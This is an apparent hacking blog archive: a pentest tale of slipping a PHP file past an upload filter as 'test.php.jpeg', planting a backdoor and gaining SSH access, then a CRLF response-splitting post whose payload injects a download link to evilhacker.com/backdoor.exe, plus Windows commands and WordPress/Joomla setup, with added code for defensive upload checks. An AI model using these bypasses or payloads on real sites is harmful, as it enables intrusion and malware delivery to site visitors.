The site has moved to the root domain, where all posts are imported. Please go to http://pusheax.com/
You are Expert!!!
I did my job very quickly after finding a file upload vulnerability in a website. I was pentesting a network remotely (black-box testing) and it was really hard. I often browsed their website. I was not even able to ping their IP because of the firewall. The only things left for me to try were social engineering and web pentesting (really, I was confused!!! If the SE and web hacking methods did not work then perhaps I was about to have a heart attack !!! lol (my heart is not weak)). Anyway, I scanned the site with various vulnerability scanners ,,,, no luck!!! So I started browsing the site manually (and Google searching randomly; truthfully I did not know what to look for).
Suddenly I found a personal file upload link. The link was hell to find, but my friend Google helped me a lot. The link was like: www.hired-me.org/test/personal/re_al/file2010.php . It accepted only 3 file extensions: JPEG, TEXT, CSV. At first I did not think this link had any vulnerability (I was already confused by the fucking scanner!!!).
How I exploited it:
First I uploaded a JPEG file and tried to find the location where it was saved. That was also hard (does my knowledge suck?). OK, at least I found the JPEG file was located at www.hired-me.com/index/hidden/director/test.jpeg . Everything okay. Now I quickly created a PHP file [test.php]:
I quickly tried to upload “test.php” and “test.jpeg.php” but got the error “Unknown File Extension”. This error made me sure that the file extension was filtered.
Then I renamed “test.php” to “test.php.jpeg”. Now no error!!! Wow!!
I quickly checked www.hired-me.com/index/hidden/director/test.php.jpeg and the page displayed “This is test“. Now I decided to upload a real PHP backdoor, then uploaded some rooting tools, then created SSH access and then compromised two additional machines. Job done!!!
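The bypass above works because of a mismatch between what the filter checks and what the server executes: a filter that looks only at the last extension accepts test.php.jpeg, while Apache with PHP enabled through AddHandler treats every dot-separated segment of the name as an extension and still hands the file to the PHP handler. The post does not show the site's filter or its server config, so the following Python model is an added example, not the original's code; the filter reconstruction, the Apache rule model, the whitelist and the PHP extension list are assumptions. The hardened function shows the fix a practitioner would want: reject a PHP extension anywhere in the name, check the bytes, and throw the client's filename away.

```python
import secrets

# Added example, not the original post's code. The target site's upload
# filter and its Apache configuration were never shown; the two
# "vulnerable" functions are assumptions that reproduce what the post
# observed (test.php and test.jpeg.php rejected, test.php.jpeg accepted
# and executed).

ALLOWED_EXT = {"jpeg", "txt", "csv"}   # the three types the upload form accepted
PHP_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}


def naive_extension_check(filename):
    """Assumed reconstruction of the site's filter: only the text after the
    LAST dot is compared against the whitelist, so 'test.php' and
    'test.jpeg.php' fail but 'test.php.jpeg' passes."""
    if "." not in filename:
        return False
    return filename.rsplit(".", 1)[1].lower() in ALLOWED_EXT


def apache_mod_php_executes(filename):
    """Model of Apache's multiple-extension rule when PHP is enabled with
    'AddHandler application/x-httpd-php .php': every dot-separated segment
    after the base name is an extension, so the '.php' in 'test.php.jpeg'
    still selects the PHP handler even though '.jpeg' comes last."""
    return any(seg.lower() in PHP_EXT for seg in filename.split(".")[1:])


def is_bypass(filename):
    """True when a name gets past the filter AND the server would run it."""
    return naive_extension_check(filename) and apache_mod_php_executes(filename)


def looks_like_jpeg(data):
    return data[:3] == b"\xff\xd8\xff"          # JPEG SOI marker


def looks_like_text(data):
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return b"\x00" not in data and b"<?" not in data


def hardened_store_name(filename, data):
    """Hardened check for the same three types. Returns the name to store
    the upload under, or None to reject it:
      1. last extension must be whitelisted and NO segment may be a PHP one
      2. the bytes must match the claimed type (magic bytes / clean text)
      3. the client's name is discarded: random base name + canonical ext
    Keeping the upload directory outside the web root (or serving it with
    'SetHandler default-handler') is still required; this only fixes the name."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]   # strip any path
    segs = base.lower().split(".")
    if len(segs) < 2:
        return None
    ext = segs[-1]
    if ext not in ALLOWED_EXT or any(s in PHP_EXT for s in segs[1:]):
        return None
    if ext == "jpeg" and not looks_like_jpeg(data):
        return None
    if ext in ("txt", "csv") and not looks_like_text(data):
        return None
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    for name in ("test.php", "test.jpeg.php", "test.php.jpeg", "test.jpeg"):
        print(f"{name:15} filter={naive_extension_check(name)!s:5} "
              f"executed={apache_mod_php_executes(name)!s:5} bypass={is_bypass(name)}")
    print(hardened_store_name("test.php.jpeg", b"<?php system($_GET['c']); ?>"))
    print(hardened_store_name("photo.jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16))
```

Run it directly to see which names pass the filter and which of those the server would execute. On the Apache side the matching fix is to replace the AddHandler line with a `<FilesMatch "\.php$">` SetHandler block, so that only names ending in .php are run, and to keep uploads outside the document root.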
Feedback is welcome!!!
If we can inject a newline into a header we control, then we will be able to insert additional HTTP headers and some nasty body text. I don’t think we can compromise a website/server via this vulnerability alone, but it is still powerful for social engineering attacks, phishing, redirecting to a malicious site, downloading a backdoor, virtual defacement, sometimes injecting cookies, etc. It is much like XSS.
Basically this vulnerability is found in the “Set-Cookie” and “Location” headers. If we connect to a website:
If this is the behaviour of the host, then we should try to insert a carriage return and line feed:
If the host is vulnerable then it will reply with an additional line “it-is=vulnerable”, like this:
Simply, a hacker can force users to download a backdoor:
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1
We can also create a fake cookie and send the URL to the poor victim. Just think smartly and you will find some other way 😉
See all the directories in a specified path:
dir /aHD c:\windows\system32
xcopy, for a directory or file:
xcopy e:\somedirectory f:\somewherecopy
We have installed WordPress, which is really very easy to install. Now I am going to show you how to install JOOMLA. I think you are smart enough to understand why we need Joomla, WordPress or other such things. Let’s start,
Download Joomla from http://www.joomla.org/download.html
It is a zip file. Extract it the same way I did for WordPress.
We need to install apache2 php5-mysql libapache2-mod-php5 mysql-server
Some of them were already installed when we installed WordPress.
So simply:
apt-get install apache2 php5-mysql libapache2-mod-php5 mysql-server
(NOTE: you need the following things installed to follow along.)
You need to install MySQL, Apache, PHP and php-gd.
Currently I am using Kubuntu. If you are also running Kubuntu or Ubuntu then run:
apt-get install mysql-server php5 php-gd php5-mysql
Specify your MySQL password. Remember that by default this will be the MySQL root password (be aware!!!).
Please download WordPress from their site (http://wordpress.org/latest.zip) with the command wget -c http://wordpress.org/latest.zip.
Now we edit. We just need to change a few simple things:
/** MySQL database username */
/** MySQL database password */
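As an added example (not the original post's code): filling those defines from wp-config-sample.php in Python, using a dedicated MySQL account rather than the root password the installer just set, and replacing the salt placeholders while we are in the file. The placeholder strings, the database and user names and the privilege list are assumptions about a standard WordPress sample config.

```python
import re
import secrets

# Added example, not the original post's code. Assumed: WordPress is already
# unpacked, the placeholders are the ones shipped in wp-config-sample.php
# ('database_name_here', 'username_here', 'password_here' and
# 'put your unique phrase here' for the salts), and the site gets its own
# MySQL account (here "wpuser") instead of the root password set above.

# Constructed here: just the lines of wp-config-sample.php that matter.
SAMPLE = """<?php
/** The name of the database for WordPress */
define('DB_NAME', 'database_name_here');

/** MySQL database username */
define('DB_USER', 'username_here');

/** MySQL database password */
define('DB_PASSWORD', 'password_here');

define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
"""

# What a WordPress install actually needs on its own database: no GRANT
# OPTION, no FILE/SUPER/PROCESS, nothing on other databases.
WP_PRIVILEGES = "SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, ALTER, INDEX"

IDENT = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def php_single_quoted(value):
    """Escape for a PHP single-quoted literal: only \\ and ' are special."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def sql_single_quoted(value):
    """Escape for a MySQL single-quoted literal."""
    return value.replace("\\", "\\\\").replace("'", "''")


def render_wp_config(sample, db_name, db_user, db_password):
    """Fill the three DB placeholders and give each salt its own random
    phrase. Refuses the root account: the web tier should never hold it."""
    if db_user == "root":
        raise ValueError("use a dedicated MySQL account, not root")
    if not (IDENT.match(db_name) and IDENT.match(db_user)):
        raise ValueError("database and user names must be [A-Za-z0-9_]")
    out = (sample.replace("database_name_here", db_name)
                 .replace("username_here", db_user)
                 .replace("password_here", php_single_quoted(db_password)))
    while "put your unique phrase here" in out:
        out = out.replace("put your unique phrase here", secrets.token_urlsafe(48), 1)
    return out


def grant_sql(db_name, db_user, db_password):
    """SQL to run once as MySQL root: the database plus an account that can
    only touch that database, from localhost, with the privilege list above."""
    if not (IDENT.match(db_name) and IDENT.match(db_user)):
        raise ValueError("database and user names must be [A-Za-z0-9_]")
    return "\n".join([
        f"CREATE DATABASE `{db_name}` CHARACTER SET utf8mb4;",
        f"CREATE USER '{db_user}'@'localhost' IDENTIFIED BY '{sql_single_quoted(db_password)}';",
        f"GRANT {WP_PRIVILEGES} ON `{db_name}`.* TO '{db_user}'@'localhost';",
        "FLUSH PRIVILEGES;",
    ])


if __name__ == "__main__":
    pw = secrets.token_urlsafe(24)
    print(grant_sql("wpdb", "wpuser", pw))
    print(render_wp_config(SAMPLE, "wpdb", "wpuser", pw))
```

Feed the printed SQL to `mysql -u root -p` once, then write the rendered text over wp-config.php; the password and salts are generated, not typed, and the account in the web tier can do nothing outside its own database.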
GOOD!!! Now you are ready to go …
Just visit http://localhost/wordpress/wp-admin/install.php (or your IP) and you will see:
Simply fill in the form and click the “Install” button.
Good!! You have just installed WordPress:
Click the “Log in” button for WordPress administration.
Now enjoy, and practice security on your own site.
Next we will install “Joomla”